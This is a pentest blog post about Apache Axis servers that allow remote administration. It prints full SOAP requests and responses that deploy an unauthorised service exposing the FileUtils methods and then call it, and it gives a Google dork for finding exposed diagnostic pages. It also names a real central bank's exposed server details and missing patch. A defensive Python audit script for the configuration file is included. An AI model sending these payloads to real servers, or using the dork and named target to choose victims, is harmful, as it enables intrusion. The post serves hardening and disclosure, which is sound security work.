Why you shouldn't use enableRemoteAdmin and lock down your Axis server

On a recent pentest I discovered an Apache Axis instance exposed on port 80. I had never seen something like this before, so I started to play with it and discovered some interesting things.

But first of all, let's have a look at what Apache Axis is and how it can be used: "Apache Axis is an implementation of the SOAP ("Simple Object Access Protocol") submission to W3C. From the draft W3C specification: SOAP is a lightweight protocol for exchanging structured information in a decentralized, distributed environment. It is an XML based protocol that consists of three parts: an envelope that defines a framework for describing what is in a message and how to process it, a set of encoding rules for expressing instances of application-defined datatypes, and a convention for representing remote procedure calls and responses." - Source: https://axis.apache.org/axis/

We'll focus on the Java version. Apache Axis allows arbitrary Java classes to be offered as a web service whose methods can be executed with a SOAP call.

How do you deploy a web service without having local access to the server? Through another web service, "AdminService" (a list of the available services can be found on /servlet/AxisServlet). So you say deploying a new web service without any authorization can't be possible? Yeah... technically you're right... but:

"I always deploy like this"

The documentation states: "WARNING: enabling remote administration may give unauthorized parties access to your machine. If you do this, please make sure to add security to your configuration!" Source: https://axis.apache.org/axis/java/user-guide.html

Usually, access to AdminService is restricted to localhost and can only be reached through another flaw, such as an XXE, as in Oracle PeopleSoft: https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce

Let's try to remotely deploy a web service that exposes all public methods of the org.apache.commons.io.FileUtils class:

POST /axis/services/AdminService HTTP/1.1
Host: censored
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
SOAPAction: "censored"
Content-Length: 832

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <ns1:deployment
            xmlns="http://xml.apache.org/axis/wsdd/"
            xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
            xmlns:ns1="http://xml.apache.org/axis/wsdd/">
            <ns1:service name="MaliciousService" provider="java:RPC">
                <ns1:parameter name="className" value="org.apache.commons.io.FileUtils"/>
                <ns1:parameter name="allowedMethods" value="*"/>
            </ns1:service>
        </ns1:deployment>
    </soapenv:Body>
</soapenv:Envelope>

If you get the following response, the deployment succeeded and "enableRemoteAdmin" is set to true:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=utf-8
Date: censored
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body><Admin>Done processing</Admin></soapenv:Body>
</soapenv:Envelope>
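The server-side view of the same condition, as an added example that is not part of the original post: a small Python audit of an Axis 1.x server-config.wsdd that flags enableRemoteAdmin=true on AdminService and a wildcard allowedMethods on any service. The sample descriptor is constructed to mirror what the deployment above would leave behind; it is not taken from a real server.

```python
"""Audit an Apache Axis 1.x server-config.wsdd for the exposure described above.

Added example, not part of the original post. SAMPLE_WSDD is a constructed
deployment descriptor shaped like the Axis default, with the unsafe setting on.
"""
import xml.etree.ElementTree as ET

WSDD_NS = "http://xml.apache.org/axis/wsdd/"
PARAM = f"{{{WSDD_NS}}}parameter"
SERVICE = f"{{{WSDD_NS}}}service"

# Constructed sample: AdminService with enableRemoteAdmin switched on, plus a
# service deployed through it that exposes every public method of FileUtils.
SAMPLE_WSDD = """<?xml version="1.0" encoding="UTF-8"?>
<deployment xmlns="http://xml.apache.org/axis/wsdd/"
            xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
  <service name="AdminService" provider="java:MSG">
    <parameter name="allowedMethods" value="AdminService"/>
    <parameter name="enableRemoteAdmin" value="true"/>
    <parameter name="className" value="org.apache.axis.utils.Admin"/>
  </service>
  <service name="MaliciousService" provider="java:RPC">
    <parameter name="className" value="org.apache.commons.io.FileUtils"/>
    <parameter name="allowedMethods" value="*"/>
  </service>
</deployment>
"""


def _params(elem):
    """Collect <parameter name=... value=.../> children into a dict."""
    return {p.get("name"): p.get("value") for p in elem.findall(PARAM)}


def audit_wsdd(xml_text):
    """Return one finding string per risky setting in a server-config.wsdd."""
    findings = []
    for svc in ET.fromstring(xml_text).findall(SERVICE):
        name, params = svc.get("name"), _params(svc)
        # The setting this post is about: remote callers may deploy services.
        if params.get("enableRemoteAdmin", "false").strip().lower() == "true":
            findings.append(f"{name}: enableRemoteAdmin=true")
        # A wildcard exposes every public method of the backing class.
        if params.get("allowedMethods", "").strip() == "*":
            findings.append(f"{name}: allowedMethods=* on {params.get('className')}")
    return findings


def is_hardened(xml_text):
    """True when no service allows remote admin or wildcard method exposure."""
    return not audit_wsdd(xml_text)


if __name__ == "__main__":
    for line in audit_wsdd(SAMPLE_WSDD):
        print(line)
```

Run it against the real server-config.wsdd of an Axis webapp (usually under WEB-INF/) to confirm the parameter is false and that no service ships with allowedMethods="*".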

You can call it by invoking getTempDirectoryPath() to get the path of the temp folder:

POST /axis/services/MaliciousService HTTP/1.1
Host: censored
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
SOAPAction: "censored"
Content-Length: 381

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <api:getTempDirectoryPath soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        </api:getTempDirectoryPath>
    </soapenv:Body>
</soapenv:Envelope>

Voilà, your path (/tmp):

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=utf-8
Date: censored
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

<soapenv:Body><ns1:getTempDirectoryPathResponse soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:ns1="http://127.0.0.1/Integrics/Enswitch/API">
<getTempDirectoryPathReturn xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">/tmp</getTempDirectoryPathReturn></ns1:getTempDirectoryPathResponse></soapenv:Body></soapenv:Envelope>

Depending on the classes available on the classpath, it is possible to execute arbitrary code and compromise the system. Even if you're unlucky, you can get a lot of information from /happyaxis.jsp, such as OS and kernel version, directory structure, Java version, configuration details and sometimes even passwords.

The Central Bank of Brazil reveals that it is using WebSphere on a Linux server (opt/WebSphere/AppServer/profiles/AppSrv) called SERVER4_DINE5 with the kernel 2.6.32-696.13.2.el6.x86_64, that its SMTP server is smtp.bcnet.bcb.gov.br, and that it seems to use java_1.7_64: https://www3.bcb.gov.br/wssgs/happyaxis.jsp According to Red Hat, they are missing at least one important security fix. :-D

Such pages can be found using the following Google dork:

inurl:"/happyaxis.jsp" intitle:"Axis Happiness Page"

You can find more blog posts about security & Axis here: https://kooksec.blogspot.de/2017/03/manually-exploiting-axis2.html, https://zeroknock.blogspot.de/2012/10/exposed-apache-axis-soap-objects.html
